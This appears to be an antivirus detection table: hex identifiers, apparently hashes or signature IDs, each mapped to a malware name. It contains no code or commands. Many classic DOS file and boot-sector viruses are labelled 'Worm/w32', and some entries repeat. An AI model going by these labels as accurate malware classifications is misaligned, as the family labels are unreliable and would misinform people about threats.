326A9E6E=Worm/w32.Vcl-Based
326DCA3C=Worm/w32.June16
3277FFAB=Worm/w32.PS-Based
32788B66=Worm/w32.Srx
327A1F8D=Worm/w32.Slovakia
327CB468=Worm/w32.Vcm
32807BC2=Worm/w32.Junior
32838E5C=Worm/w32.PS-Based
328B3480=Worm/w32.Pojer
328D1678=Worm/w32.Beer
328E250E=Worm/w32.KillCMOS.C
32926523=Worm/w32.Phantom1.E
329342F3=Worm/w32.PS-Based
329379AE=Worm/w32.Pixel
329C9C53=Worm/w32.Riot
329F070E=Worm/w32.TraceBack
32A02C83=Worm/w32.PS-Based
32A17AE4=Worm/w32.Invader.G
32AA5884=Worm/w32.Australian
32B7B1F5=Worm/w32.House
32B91938=Worm/w32.Intended
32BCC408=Worm/w32.Search
32BD040C=Worm/w32.Helloween
32BD40E6=Worm/w32.PS-Based
32BF2E3B=Worm/w32.Olivia
32BF5B61=Worm/w32.Dreg-Based
32BFE521=Worm/w32.PS-Based
32C4793B=Worm/w32.PS-Based
32C951C0=Worm/w32.Mps
32CA4B93=Worm/w32.Ko
32CB3F39=Worm/w32.Bvm
32CB6E50=Worm/w32.Lyceum
32CEAAB1=Worm/w32.Jerusalem.A
32CFAE02=Worm/w32.PS-Based
32D08909=Worm/w32.Dreamer
32DE3362=Worm/w32.Dsme.Connie
32E13FC5=Worm/w32.Vesna
32E20F8F=Worm/w32.Dutch_Tiny.A
32E3FB28=Worm/w32.Dutch_Tiny.B
32E46FC8=Worm/w32.SomeKit
32E921FD=Worm/w32.Bw.SeaStorm
32EEE8A4=Worm/w32.PS-Based
32F087D7=Worm/w32.PS-Based
32F49AD5=Worm/w32.Vole
32F78B6D=Worm/w32.Vcl.B
32F90C53=Worm/w32.PS-Based
32FED6FE=Worm/w32.SillyC.B
33079204=Worm/w32.Radyum
330923EF=Worm/w32.Twin.D
33098F2F=Worm/w32.MF
330CE2CE=Worm/w32.Fish#6
330D2FD7=Worm/w32.Hellfire
3310C626=Worm/w32.Jerusalem.Q
33142C78=Worm/w32.Grog
33184824=Worm/w32.Jerusalem.A
331B525D=Worm/w32.Markiz
33273DFE=Worm/w32.Tpvo
3334512F=Worm/w32.PS-Based
3335558C=Worm/w32.Pcbb.A
3339C8D2=Worm/w32.Nothing
333EE898=Worm/w32.PS-Based
333FAD23=Worm/w32.Riot
33430EF8=Worm/w32.Chameleon
3346658E=Worm/w32.Ko.B
33477EDE=Worm/w32.Khizhnjak
334A6CB3=Worm/w32.Vienna.A
334CA49F=Worm/w32.Dreamer
335077E8=Worm/w32.Beer
335077E8=Worm/w32.Beer
335B89A7=Worm/w32.Monster.B
335D20C1=Worm/w32.Jerkin
335E30ED=Worm/w32.Es.B
3364127C=Worm/w32.PS-Based
3366EC5A=Worm/w32.Ivp-Based
3368A1D2=Worm/w32.Whale
3369A988=Worm/w32.BetaBoys
336C4938=Worm/w32.DrJohn
336FF6D4=Worm/w32.Tiny
33709EA3=Worm/w32.Leprosy
33714519=Worm/w32.Bw-Based
33776CD0=Worm/w32.Cybercide
337A32A2=Worm/w32.Arara
337D9C7A=Worm/w32.Search
337E8EE5=Worm/w32.PS-Based
33801CA8=Worm/w32.XWG
33807C98=Worm/w32.Arcv
33840D85=Worm/w32.Hellfire
33866D19=Worm/w32.Australian
338B70F8=Worm/w32.Grace
338E3EA3=Worm/w32.I13
33907DEB=Worm/w32.Joan
33908764=Worm/w32.G2-Based
3391A5E8=Worm/w32.Sarampo
3397010F=Worm/w32.FallenAngel
339EECC2=Worm/w32.PS-Based
33A18646=Worm/w32.Ivp-Based
33A9D61E=Worm/w32.Flue
33AADB49=Worm/w32.Video
33ADD00B=Worm/w32.PeaceKeeper.A
33B0528F=Worm/w32.HelloUser.B
33B5F17A=Worm/w32.Itv
33B6559F=Worm/w32.Yankee.A
33B7890A=Worm/w32.Stealth.B
33B91B2D=Worm/w32.Fis
33B95C9B=Worm/w32.PS-Based
33BB6239=Worm/w32.Nrlg-Based
33BE1555=Worm/w32.Anthrax
33C350E2=Worm/w32.Mnemonix
33C52EF7=Worm/w32.PS-Based
33C84181=Worm/w32.Tu28
33D4C72A=Worm/w32.Bailey
33DBC4D2=Worm/w32.Vcc
33DE3EE7=Worm/w32.PS-Based
33DF49F9=Worm/w32.Chameleon
33E19179=Worm/w32.PS-Based
33E7570F=Worm/w32.PS-Based
33E7888D=Worm/w32.Dreg-Based
33EB5590=Worm/w32.Snake
33EEEB9A=Worm/w32.Vcl-Based
33F2F1F3=Worm/w32.Nrlg-Based
33F31EF3=Worm/w32.Datacrime.A
33F76E9E=Worm/w32.G2-Based
33F7C1BB=Worm/w32.Janka
33FA47D6=Worm/w32.CyberTech
33FC5A7C=Worm/w32.Nrlg-Based
33FEFBC9=Worm/w32.Cookie
340316AB=Worm/w32.Eddie
34110C42=Worm/w32.GencVir
341AEFAF=Worm/w32.Vp
341F0123=Worm/w32.Cascade.E
3424435C=Worm/w32.LoadHigh
3425C7E9=Worm/w32.MtE.B
342753A0=Worm/w32.PS-Based
342A1BC2=Worm/w32.Bzz
342D36D1=Worm/w32.Mindless
34341875=Worm/w32.SillyC
343A07AA=Worm/w32.Eumel
343D7A5F=Worm/w32.Ntit
343E5815=Worm/w32.Vienna
344009F5=Worm/w32.PS-Based
34418629=Worm/w32.Ivp
34442353=Worm/w32.PS-Based
344534ED=Worm/w32.PS-Based
3445830B=Worm/w32.Funeral.B
3445CF32=Worm/w32.PS-Based
3448B8F5=Worm/w32.PS-Based
344C3DCA=Worm/w32.Istanbul
344E0192=Worm/w32.Vienna
344EA335=Worm/w32.Dm.A
3452A4B1=Worm/w32.Leprosy.R
3452D53F=Worm/w32.Dutch_Tiny.A
345514F7=Worm/w32.Nuke
345DD1BA=Worm/w32.Yb
34615B30=Worm/w32.Dodgy.A
3463FB0C=Worm/w32.Dvc
34650BB4=Worm/w32.Bw.Jakarta
34665ECA=Worm/w32.PS-Based
3469D5D7=Worm/w32.PS-Based
346A9F61=Worm/w32.Vienna
34708031=Worm/w32.Skew
3473CFF2=Worm/w32.Riot
347FD817=Worm/w32.MemLapse
3483FAB3=Worm/w32.G2-Based
348924CC=Worm/w32.Fish#6
348FAD72=Worm/w32.Ssr
34903543=Worm/w32.Cd
3490415C=Worm/w32.PS-Based
349042E6=Worm/w32.PS-Based
34921879=Worm/w32.Vienna.C
34937364=Worm/w32.Egg
3494F08F=Worm/w32.Itv
34953FEC=Worm/w32.Vienna
3495F519=Worm/w32.Bw.SeaStorm
349618A4=Worm/w32.Nrlg-Based
349882D4=Worm/w32.DAS_Boot.B
34991E72=Worm/w32.PS-Based
349AD6BF=Worm/w32.Csl
349DAAE6=Worm/w32.Vlad.Antipode
34A6DC1B=Worm/w32.Riot
34A85F89=Worm/w32.Hallochen.A
34A8F6E2=Worm/w32.Search
34AE40F1=Worm/w32.Companion.A
34B0C4E3=Worm/w32.PS-Based
34B1E984=Worm/w32.Svc
34B35073=Worm/w32.PS-Based
34B615E0=Worm/w32.Svc.A
34B7264F=Worm/w32.PS-Based
34C05CCF=Worm/w32.Leprosy
34C05ECF=Worm/w32.PS-Based
34C0DA77=Worm/w32.PS-Based
34C5C426=Worm/w32.Baloo
34CA2A39=Worm/w32.Nrlg-Based
34CC7299=Worm/w32.Jerusalem.A
34CFE242=Worm/w32.Goma
34DBB0FE=Worm/w32.Eddie.A
34DE666F=Worm/w32.Mirea
34DE760F=Worm/w32.VKit-Based
34E375E0=Worm/w32.Anthrax
34E4D86B=Worm/w32.Alicia.Zip
34E7D45F=Worm/w32.Riot
34E821DA=Worm/w32.PS-Based
34E8833E=Worm/w32.Freezer
34EA64F6=Worm/w32.1_COM
34EAF5B1=Worm/w32.Spanska
34EDB6B2=Worm/w32.PS-Based
34F0B3C7=Worm/w32.PS-Based
34F67B6A=Worm/w32.Cascade
34FFE5AA=Worm/w32.Vienna
35004481=Worm/w32.Friday13.A
3500989F=Worm/w32.PS-Based
3500BDBB=Worm/w32.Lts
3501BF8F=Worm/w32.Tadpole
3502DDD8=Worm/w32.Vlad
35054E3D=Worm/w32.WereWolf.D
3506418F=Worm/w32.Lr
35078360=Worm/w32.Hma_Boot.A
3509B012=Worm/w32.Ivp-Based
350B8BB9=Worm/w32.Mnemonix
350CCD74=Worm/w32.PS-Based
350F46BB=Worm/w32.PS-Based
350F9C41=Worm/w32.Quark
3510DCE4=Worm/w32.MtE.Ludwig
3513BBEA=Worm/w32.Rpme
35149E8B=Worm/w32.Intended
3515825C=Worm/w32.JpegKiller
3517148A=Worm/w32.Jerusalem.B
351B3488=Worm/w32.Jerusalem.J
351E0928=Worm/w32.Guide
351E7E18=Worm/w32.Face
352282EB=Worm/w32.Australian
3524B2CA=Worm/w32.SomeKit
352566B4=Worm/w32.PS-Based
35334748=Worm/w32.SillyC
353A590D=Worm/w32.Adrian
353BA3C7=Worm/w32.Beer
353C5A00=Worm/w32.Bw-Based
353D8913=Worm/w32.Mahon
353D8EE4=Worm/w32.Intended
3540BD95=Worm/w32.CivilWar.V
354173CB=Worm/w32.PS-Based
35424D74=Worm/w32.Quit.A
3543BAFA=Worm/w32.Vcc
3543FD69=Worm/w32.DeadWin
3544A14D=Worm/w32.PS-Based
3544C3F2=Worm/w32.Australian
3545CDD5=Worm/w32.PS-Based
3546D498=Worm/w32.Devore
35481490=Worm/w32.Hellfire
354A6164=Worm/w32.Jerusalem
354B04BC=Worm/w32.Fog.AirRaid
3551E25B=Worm/w32.Nrlg-Based
35525BC7=Worm/w32.DBase
3552FCDF=Worm/w32.Dreg
355379F0=Worm/w32.Nrlg-Based
355B1263=Worm/w32.Lavi.B
355F076E=Worm/w32.Horse
355F895B=Worm/w32.Nrlg-Based
355FC9E9=Worm/w32.Cascade
35607244=Worm/w32.G2-Based
3560DCE7=Worm/w32.Stupid
356495B5=Worm/w32.PS-Based
3567064B=Worm/w32.Rape
356EF8C7=Worm/w32.PS-Based
356F3500=Worm/w32.Natas
357198C7=Worm/w32.WereWolf.A
3573A8EA=Worm/w32.Sirius
3574DC6D=Worm/w32.SillyC
35776D12=Worm/w32.PS-Based
3578ACD9=Worm/w32.Borg-Based
357987D9=Worm/w32.Jerusalem.A
358EBA4A=Worm/w32.MidInfector
3592D158=Worm/w32.Paraguay
35932667=Worm/w32.Nrlg-Based
35942672=Worm/w32.Findme
3594E2D8=Worm/w32.Palma
3594F75E=Worm/w32.Rotceh.A
35953AAA=Worm/w32.PS-Based
359623FF=Worm/w32.Mephisto
35974D25=Worm/w32.Arcv
35993FEE=Worm/w32.MutaGen
359A0EB3=Worm/w32.G2.Dread
359A78FB=Worm/w32.Vienna
35A43AE2=Worm/w32.Jerusalem.A
35A4BE84=Worm/w32.Borg-Based
35A71557=Trojan/tr.TimeBomb.A
35B2F176=Worm/w32.Intended
35B479B0=Worm/w32.Genesis
35B9685C=Worm/w32.Ivp-Based
35BDAF0A=Worm/w32.SillyRC
35C292C7=Worm/w32.Bw-Based
35C562AF=Worm/w32.Mirror.A
35C745CA=Worm/w32.Vienna.A
35C74BEC=Worm/w32.Ivp-Based
35C96DB8=Worm/w32.Nuke
35CD7219=Worm/w32.PS-Based
35D1BC5F=Worm/w32.AntiSabados
35D21FE2=Worm/w32.Vlad
35D2871B=Worm/w32.PS-Based
35D5E85D=Worm/w32.Vcl-Based
35D6A3B7=Worm/w32.Svc
35D6F78D=Worm/w32.Cascade.B
35D95FCD=Worm/w32.PS-Based
35DDF193=Worm/w32.Caterpillar
35DE2342=Worm/w32.Yankee.A
35E2D9E5=Worm/w32.Riot
35E48D21=Worm/w32.Timid
35E4B3B3=Worm/w32.SillyC
35E5E50F=Worm/w32.SillyRC
35EDE8E4=Worm/w32.Totobola
35F6687B=Worm/w32.Armageddon
35F9942C=Worm/w32.Bw-Based
35FC4E53=Worm/w32.Jak
35FEF374=Trojan/tr.DelIosys.B
3606D33A=Worm/w32.Vcl-Based
36135691=Worm/w32.PS-Based
36188F2E=Worm/w32.Sadam
3618B5F7=Worm/w32.Yankee.B
361CBEC9=Worm/w32.Digger
36218E4A=Worm/w32.Eumel
362670C6=Worm/w32.Vienna.B
362A5994=Worm/w32.PS-Based
362C0A8B=Worm/w32.Cascade
362CBE19=Worm/w32.PS-Based
362FD4C0=Worm/w32.Cascade
3633A087=Worm/w32.Mandra
36377350=Worm/w32.AntiPascal.G
363916B5=Worm/w32.Mnemonix
363B319D=Worm/w32.PS-Based
363C857E=Worm/w32.Intended
3641A7CC=Worm/w32.SayNay
3642D5DB=Worm/w32.Vp
3645B239=Worm/w32.PS-Based
3649CD0E=Worm/w32.Zany
365026AF=Worm/w32.Ritzen
36507597=Worm/w32.St
36543606=Worm/w32.PS-Based
3655CA65=Worm/w32.Cpw
3657B0D1=Trojan/tr.Spy.Avl
3659946C=Worm/w32.Bob.A
365B9FD0=Worm/w32.Tanya.B
365FBA7C=Worm/w32.Vcl-Based
36608DEE=Worm/w32.Burma.B
366276AB=Worm/w32.Mnemonix
366441A7=Worm/w32.PS-Based
366B5D99=Worm/w32.NotStoned
367321E5=Worm/w32.Grog
3674D79C=Worm/w32.Folko
3675B715=Worm/w32.Genesis
3675B715=Worm/w32.Genesis
367DC471=Worm/w32.Kov.Eddy
3680B407=Worm/w32.PS-Based
36881E12=Worm/w32.Nomenklatura.A
368A1F41=Worm/w32.Dutch_Tiny.A
368A28A4=Worm/w32.Jerusalem
368D843B=Worm/w32.Yanush
3692150C=Worm/w32.Christmas
369573D9=Worm/w32.Cryptor
3696E858=Worm/w32.AntiPascal
369810DC=Worm/w32.Eddie
36992393=Worm/w32.Hafen
369A772C=Worm/w32.Mg.D
36A4817E=Worm/w32.SillyC
36ABBFBB=Worm/w32.Traveller
36AC0AA2=Worm/w32.CodeBreaker
36AF8BFA=Worm/w32.Nina.A
36B108C2=Worm/w32.Jerusalem
36B5FDF9=Worm/w32.Vcl-Based
36B6F279=Worm/w32.Australian
36B8243D=Worm/w32.MemLapse
36BBAAD8=Worm/w32.Leprosy
36BD3FA1=Trojan/tr.Upgrader
36BE08C0=Worm/w32.Albania
36C02CD8=Worm/w32.Anarchy
36C33543=Worm/w32.Nrlg-Based
36C3E408=Worm/w32.Khizhnjak
36C565DF=Worm/w32.Cascade.X
36CAB606=Worm/w32.VirTool
36CCCF7D=Worm/w32.Loz
36CD42F8=Worm/w32.Small
36D3D2C8=Worm/w32.Diamond
36D424E2=Worm/w32.PS-Based
36D4C2CF=Worm/w32.Armee.A
36D5656B=Worm/w32.Kilroy.H
36D59DD0=Worm/w32.Scitzo
36DB5901=Worm/w32.MtE.Lct
36DB6CE3=Worm/w32.V
36DC1362=Worm/w32.Nuke
36E1704E=Worm/w32.Cascade.X
36E7C85B=Worm/w32.MutaGen
36EA7529=Worm/w32.Leprosy.F
36EB6588=Worm/w32.Yoyo
36EC9FD9=Worm/w32.PS-Based
36EDBC12=Worm/w32.Hate
36F2A079=Worm/w32.Rainbow
37035DE0=Worm/w32.Trinidad.B
37088C9B=Worm/w32.Brain
3708B62F=Worm/w32.Rape.A
370977CF=Worm/w32.PS-Based
37164722=Worm/w32.Vcs.Dropper
3716B1B9=Worm/w32.Dan.Octubre
3719501B=Worm/w32.G2-Based
371A996F=Worm/w32.Ambulance.A
371EC3E7=Worm/w32.Dreg-Based
371F77D9=Worm/w32.Murphy
3720273F=Worm/w32.Born2Loose
3725D80E=Worm/w32.PS-Based
372A9291=Worm/w32.Vacsina
372B9F53=Worm/w32.Frodo
372BCE3E=Worm/w32.Australian
3732B623=Worm/w32.Dreg-Based
374690F7=Worm/w32.Ssh
374A8B0A=Worm/w32.Zorm
374FE67C=Worm/w32.Amoeba
375C65E7=Worm/w32.PS-Based
37607593=Worm/w32.PS-Based
3762653D=Worm/w32.Katvir
376425F3=Worm/w32.PS-Based
3764C498=Worm/w32.Mstu
3766C7CB=Worm/w32.FrodoSoft
37683D4D=Worm/w32.Rainbow
376894CF=Worm/w32.Vienna.A
376BE70C=Worm/w32.Frodo.A
376D528D=Worm/w32.SillyRC.B
376D5DA9=Worm/w32.SillyC.A
376D77A7=Worm/w32.Arcv
37702CCC=Worm/w32.Mururoa
37739636=Worm/w32.SillyC.A
377B40E2=Worm/w32.Jerusalem.A
377D0A4D=Worm/w32.Riot
3784F857=Worm/w32.Konrad
37884C43=Worm/w32.Xuxa
379A96DB=Worm/w32.Rmns
379F6B45=Worm/w32.Wave
37AA19CE=Worm/w32.Kilroy.A
37AED966=Worm/w32.Arara
37B0C4A7=Worm/w32.Ntit
37B2E9AE=Worm/w32.SillyC
37B41DEB=Worm/w32.PS-Based
37B548E1=Worm/w32.PS-Based
37BE3FB0=Worm/w32.Nrlg-Based
37BF32E0=Worm/w32.Abraxas
37C099A3=Worm/w32.Intended
37C3217F=Worm/w32.SillyC
37C3FF98=Worm/w32.PS-Based
37C65585=Worm/w32.MadSatan
37CB9C66=Worm/w32.Vienna.B
37CE200D=Worm/w32.Made.B
37CF2BD9=Worm/w32.G2-Based
37D35B85=Worm/w32.PS-Based
37D3F147=Worm/w32.PS-Based
37D72924=Worm/w32.Tangle
37DF9ABD=Worm/w32.Intended.B
37E495DD=Worm/w32.Pixel
37E9FF50=Worm/w32.Subconsious
37EB30EC=Worm/w32.Vienna.B
37ECD55C=Worm/w32.BitAddict
37F2889F=Worm/w32.Bw-Based
37F517E7=Worm/w32.F4
37F68D7C=Worm/w32.Leech
37F8B241=Worm/w32.Nrlg-Based
3809C2B1=Worm/w32.Wilbur.B
3811AC90=Worm/w32.AdiPop
3815E0F3=Worm/w32.Viper
3817A647=Worm/w32.PS-Based
381B492C=Worm/w32.Mad
381BD90C=Worm/w32.Hllo.E
381BF8DC=Worm/w32.Nrlg-Based
381CC9E4=Worm/w32.PS-Based
382444D0=Worm/w32.PS-Based
38279313=Worm/w32.Cascade.X
383228C5=Worm/w32.Vcl-Based
38346CA0=Worm/w32.Ivp-Based
38371E97=Worm/w32.Christ
3839887F=Worm/w32.Armageddon.B
3839D327=Worm/w32.Nothing
383B0AFF=Worm/w32.Wb.B
383FB462=Worm/w32.Horse
38409B66=Worm/w32.Murphy
3840C814=Worm/w32.PS-Based
384C19C0=Worm/w32.PS-Based
385162AD=Worm/w32.G2-based
3851C01F=Worm/w32.PS-Based
38529D27=Worm/w32.PS-Based
3855DCB6=Worm/w32.PS-Based
38627740=Worm/w32.Zub
386AA20B=Worm/w32.Nrlg-Based
386B3A77=Worm/w32.MutaGen
386DC212=Worm/w32.Bw-Based
38713B2F=Worm/w32.Australian.B
3873250D=Worm/w32.Csl
387AACB6=Worm/w32.G2-Based
387ABCA6=Worm/w32.Nrlg-Based
387F9419=Worm/w32.Nrlg-Based
388D0E9E=Worm/w32.Abraxas_II
388EDD7D=Worm/w32.PS-Based
3890D7CA=Worm/w32.Vienna
3892F48F=Worm/w32.Rainbow
38933037=Worm/w32.HH&HH.A
38959830=Worm/w32.Cascade.E
38A0229E=Worm/w32.Nrlg-Based
38A12880=Worm/w32.CyberTech
38A53B4C=Worm/w32.Loz
38A8D88F=Worm/w32.Munya.A
38AA3BFF=Worm/w32.Nrlg-Based
38AC3B50=Worm/w32.Vcl-Based
38AEB14D=Worm/w32.Vienna.B
38B27B25=Worm/w32.Dumb.B
38B2CC21=Worm/w32.ByteSV
38B3722B=Worm/w32.DarthVader
38BAC796=Worm/w32.Winsurf.B
38C4C56E=Worm/w32.Polifemo
38CA3341=Worm/w32.Vcs.dropper
38CB7CBD=Worm/w32.Intended
38CDA019=Worm/w32.Khizhnjak
38CE9198=Worm/w32.Vice
38D20145=Worm/w32.Yankee.A
38D2A4A1=Worm/w32.Intended
38D9483B=Worm/w32.PS-Based
38DDB232=Worm/w32.SillyC.A
38E2C355=Worm/w32.Champaigne
38EB1768=Worm/w32.Beer
38EC94A8=Worm/w32.Australian
38ECBB67=Worm/w32.Ivp.Birgit.B
38F0D737=Worm/w32.PS-Based
38F178BE=Worm/w32.Rom
39042EDE=Worm/w32.PS-Based
3904386C=Worm/w32.Spooky
39065EBB=Worm/w32.Kode4
390E9474=Worm/w32.Sarov
39127FD0=Worm/w32.Rtl
3912AB6B=Worm/w32.SixFaces
39136F77=Worm/w32.MemLapse
39158CD5=Worm/w32.Sirius
3915E236=Worm/w32.Ida
391AF831=Worm/w32.Tved
391DC4BA=Worm/w32.Ivp-Based
391E7317=Worm/w32.Trebujena
391EB9B7=Worm/w32.As
3926AC69=Worm/w32.Stoned.F
3926FE87=Worm/w32.NRLG-based
39284214=Worm/w32.Dutch_Tiny
392F5AC1=Worm/w32.Akuku.E
3934A37D=Worm/w32.Nrlg-Based
3938B608=Worm/w32.Abraxas
393AC53D=Worm/w32.PS-Based
39407544=Worm/w32.SillyC.B
39427E12=Worm/w32.Nado
39429242=Worm/w32.Nrlg-Based
3943492B=Worm/w32.Helloween
3943F670=Worm/w32.PS-Based
394EBD14=Worm/w32.I13
39517904=Worm/w32.Stoned.A
39540C00=Worm/w32.King
395741D1=Worm/w32.TMC_6x9
39581F5C=Worm/w32.Riot
39582713=Worm/w32.PS-Based
395B6EB7=Worm/w32.Bolero
396099CB=Worm/w32.Companion
3966A3AA=Worm/w32.Bravo!
39690D6F=Worm/w32.Crawler
39697A33=Worm/w32.Animo
396AC6D1=Worm/w32.Bw-Based
396B6F05=Worm/w32.Ivp
396BA101=Worm/w32.Burglar
396C06A2=Worm/w32.Vcc.A
396E99A7=Worm/w32.PS-Based
39769DF9=Worm/w32.Slovakia
397CE7E0=Worm/w32.Psycho
397E3B0D=Worm/w32.Bw-Based
3982693A=Worm/w32.CyberTech
398405C2=Worm/w32.Schizo
39852F49=Worm/w32.Australian
39888F65=Worm/w32.SillyC.B
39934705=Worm/w32.Grog
3996F30F=Worm/w32.Cj
3998FCF0=Worm/w32.Mainman
399DC1B9=Worm/w32.Dex
399FEE29=Worm/w32.SillyOC
39A56598=Worm/w32.Vienna
39A80010=Worm/w32.VirTool
39ABFCDA=Worm/w32.Vlad
39AC9441=Worm/w32.Intended
39B0AC85=Worm/w32.Dupl
39B87097=Worm/w32.Crucifixion
39BC862D=Worm/w32.Leprosy.J
39BE4FFB=Worm/w32.MemLapse
39BECF62=Worm/w32.PS-Based
39BEF8BB=Worm/w32.PS-Based
39BF1B7C=Worm/w32.Seeg
39C02A10=Worm/w32.Ivp-Based
39C25096=Worm/w32.HelloUser.A
39C2C30E=Worm/w32.Homecome
39CBDB3B=Worm/w32.CrazyBytes
39CEF4AB=Worm/w32.RatSoft
39CFA9A4=Worm/w32.DieHard2.F
39CFDA07=Worm/w32.PS-Based
39D4E93B=Worm/w32.Vcl
39D872B7=Worm/w32.Cha
39D93B27=Worm/w32.Orchid
39E865C5=Worm/w32.PS-Based
39E8722E=Worm/w32.Lawine
39E9247E=Worm/w32.Endofday
39EB71D9=Worm/w32.G2-Based
39EC4447=Worm/w32.Hehehe
39EF5E96=Worm/w32.PS-Based
39F0DB2A=Worm/w32.PS-Based
39F0EE71=Worm/w32.TraceBack
39F1E554=Worm/w32.G2-Based
39F5D1E6=Worm/w32.Monster.A
39F9DCCF=Worm/w32.G2-Based
39FACEBF=Worm/w32.Sebo
39FC7FCD=Worm/w32.Cybercide
3A02EBAC=Worm/w32.MtE.B
3A04C13C=Worm/w32.Vienna
3A05E353=Worm/w32.Mirea
3A060B61=Worm/w32.Linc
3A090A04=Worm/w32.G2-Based
3A0BAEDD=Worm/w32.Cascade.H
3A0BCCCE=Worm/w32.PS-Based
3A0C290D=Worm/w32.Gidra
3A10089E=Worm/w32.PS-Based
3A14C538=Worm/w32.Vgpsi.B
3A1AD1C8=Worm/w32.Svc
3A1D882F=Worm/w32.Xav
3A1F0508=Worm/w32.Arcv.B
3A2591EA=Worm/w32.Eddie
3A26D2C6=Worm/w32.Tpe
3A2A6E8B=Worm/w32.Small
3A341FF7=Worm/w32.Joker01
3A3869C5=Worm/w32.PS-Based
3A38D24F=Worm/w32.Aref
3A3C519A=Worm/w32.Ttq
3A3E7892=Worm/w32.SillyC.C
3A4A6D3E=Worm/w32.Jerusalem.A
3A4DC135=Worm/w32.Australian
3A4E6CF7=Worm/w32.Bw-Based
3A53B259=Worm/w32.Flue
3A541E87=Worm/w32.Vienna.A
3A547DB2=Worm/w32.Vlad
3A56E733=Worm/w32.Nrlg-Based
3A583FBB=Worm/w32.Mg.A
3A5A934B=Worm/w32.Khizhnjak
3A5F965E=Worm/w32.Bw-Based
3A612FD3=Worm/w32.Hidenowt.E
3A647AAC=Worm/w32.PS-Based
3A64B7D0=Worm/w32.Zmt
3A66184D=Worm/w32.Intended
3A66C3D0=Worm/w32.PS-Based
3A673844=Worm/w32.Fist
3A67FEE1=Worm/w32.Phantom
3A69A18B=Worm/w32.PS-Based
3A6EB4FC=Worm/w32.Intended
3A71A410=Worm/w32.Vcl
3A745396=Worm/w32.Pixel
3A752976=Worm/w32.Cuareim
3A78403C=Worm/w32.Winstart_III.B
3A7898A0=Worm/w32.Khizhnjak
3A78EE55=Worm/w32.Beer
3A7C5626=Worm/w32.Flip
3A7F0D88=Worm/w32.Bw-Based
3A83C140=Worm/w32.PS-Based
3A8400C5=Worm/w32.DBase
3A843049=Worm/w32.Ivp
3A8BC6FD=Worm/w32.PS-Based
3A94A5F4=Worm/w32.PS-Based
3A95A34D=Worm/w32.Belorussia
3A9BB0A4=Worm/w32.PS-Based
3AA04CF9=Trojan/tr.Dood
3AA9BCC5=Worm/w32.Andry
3AAA0158=Worm/w32.Australian
3AAADC07=Worm/w32.Intended
3AAB9897=Worm/w32.Dutch_Tiny
3AB55670=Worm/w32.Yb
3AB5663D=Worm/w32.PS-Based
3AB81978=Worm/w32.Vienna
3AB8C2FD=Worm/w32.V
3ABEB8AA=Worm/w32.Zoo.B
3ABEDD18=Worm/w32.PS-Based
3AC567D1=Worm/w32.Ivp
3AC70C7D=Worm/w32.Nuke
3AD24F85=Worm/w32.Vienna
3AD32363=Worm/w32.Alho
3AD7C98A=Worm/w32.Jerusalem
3AD8E16A=Worm/w32.Vcl
3ADB0C5D=Worm/w32.PS-Based
3ADC0D7D=Worm/w32.PS-Based
3ADE51A8=Worm/w32.Morgan
3ADEDE50=Worm/w32.Tricks.E
3AE2656D=Worm/w32.Suspicion
3AE29ABC=Worm/w32.Cascade
3AE69A7F=Worm/w32.PS-Based
3AE710DD=Worm/w32.Mlti.A
3AE8E75F=Worm/w32.Crash
3AEE5476=Worm/w32.Riot.X
3AF0D3A5=Worm/w32.Hellfire
3AF1925C=Worm/w32.Dan.B
3AF19D8F=Worm/w32.Xed
3AFE2BBF=Worm/w32.Intended
3AFE2DD3=Worm/w32.Win16
3AFF7330=Worm/w32.PS-Based
3B002A8F=Worm/w32.Intended
3B01DAC0=Worm/w32.PS-Based
3B02B2FB=Worm/w32.Ash.A
3B05CBB0=Worm/w32.Mephisto
3B0D7556=Worm/w32.Tpe-Based
3B0F1536=Worm/w32.Wilbur.D
3B131063=Worm/w32.Vcl-Based
3B1479B1=Worm/w32.Flash
3B15EDC2=Worm/w32.Ziuck
3B1633CD=Worm/w32.Fish#6
3B1A0D94=Trojan/tr.InfoSpace
3B1D706C=Worm/w32.Cybercide
3B1EE38E=Worm/w32.Ginger
3B21C096=Worm/w32.Kranty
3B227F63=Worm/w32.Its
3B248551=Worm/w32.Nrlg-Based
3B253D84=Worm/w32.PS-Based
3B28A86D=Worm/w32.Zzz
3B2B647C=Worm/w32.Dutch_Tiny
3B2CE113=Worm/w32.Eddie
3B3543BB=Worm/w32.PS-Based
3B36DD25=Worm/w32.PS-Based
3B37643B=Worm/w32.PS-Based
3B3CB67F=Worm/w32.SillyC.B
3B3D1524=Worm/w32.SillyRCE.B
3B3E5EE9=Worm/w32.PS-Based
3B41F055=Worm/w32.Karas
3B467D08=Worm/w32.Intended
3B4A9006=Worm/w32.Telefonica
3B51BBDA=Worm/w32.SatanBrain
3B54BD10=Worm/w32.Parasite
3B55F132=Worm/w32.Vcl-Based
3B56761B=Worm/w32.PS-Based
3B5F3F96=Worm/w32.Vcc.Gothic
3B5FCDCB=Worm/w32.Blink
3B60A87B=Worm/w32.Bauman
3B6382EC=Worm/w32.Ivp.Overwriting
3B6955FE=Worm/w32.Riot.Lisa
3B6DF556=Worm/w32.Murphy
3B6EE43E=Worm/w32.Anti-Avp
3B740EE7=Worm/w32.Beer
3B7784FB=Worm/w32.Scrunch
3B7D7EFB=Worm/w32.Liquid
3B822A69=Worm/w32.Daemaen
3B82A369=Worm/w32.Cd.2161
3B860D08=Worm/w32.PS-Based
3B88301E=Worm/w32.Nrlg-Based
3B8BD8C1=Worm/w32.Dune
3B929877=Worm/w32.PS-Based
3B966202=Worm/w32.Vacsina
3B966F5E=Worm/w32.Leprosy
3B96AF02=Worm/w32.Mururoa
3B97686F=Worm/w32.Arcv.Anna
3B984359=Worm/w32.Murphy
3B9981BE=Worm/w32.Pivrnec
3BA48806=Worm/w32.Fish#6
3BA4C0E0=Worm/w32.Leech.Klang
3BA4E2FD=Worm/w32.Riot.Immortal
3BAA587A=Worm/w32.Eddie.F
3BAAF188=Worm/w32.Yankee
3BAEE992=Trojan/tr.Plato
3BB0B162=Worm/w32.V.664
3BB11A71=Worm/w32.Bw-Based
3BB26ABE=Worm/w32.Jerusalem.Fumanchu.A
3BB5413B=Worm/w32.Vienna-Based
3BB543D3=Worm/w32.Cpp.242
3BBA1421=Worm/w32.PS-Based
3BBBD41E=Worm/w32.PS-Based
3BBE6771=Worm/w32.Mikrob
3BBFD1A3=Worm/w32.PS-Based
3BC1F026=Worm/w32.Serbu.A
3BC6C45D=Worm/w32.Companion.B
3BC8DA37=Worm/w32.G2-Based
3BCA2F74=Worm/w32.Grade
3BCC2BB7=Worm/w32.Dan.Wma
3BD02976=Worm/w32.PS-Based
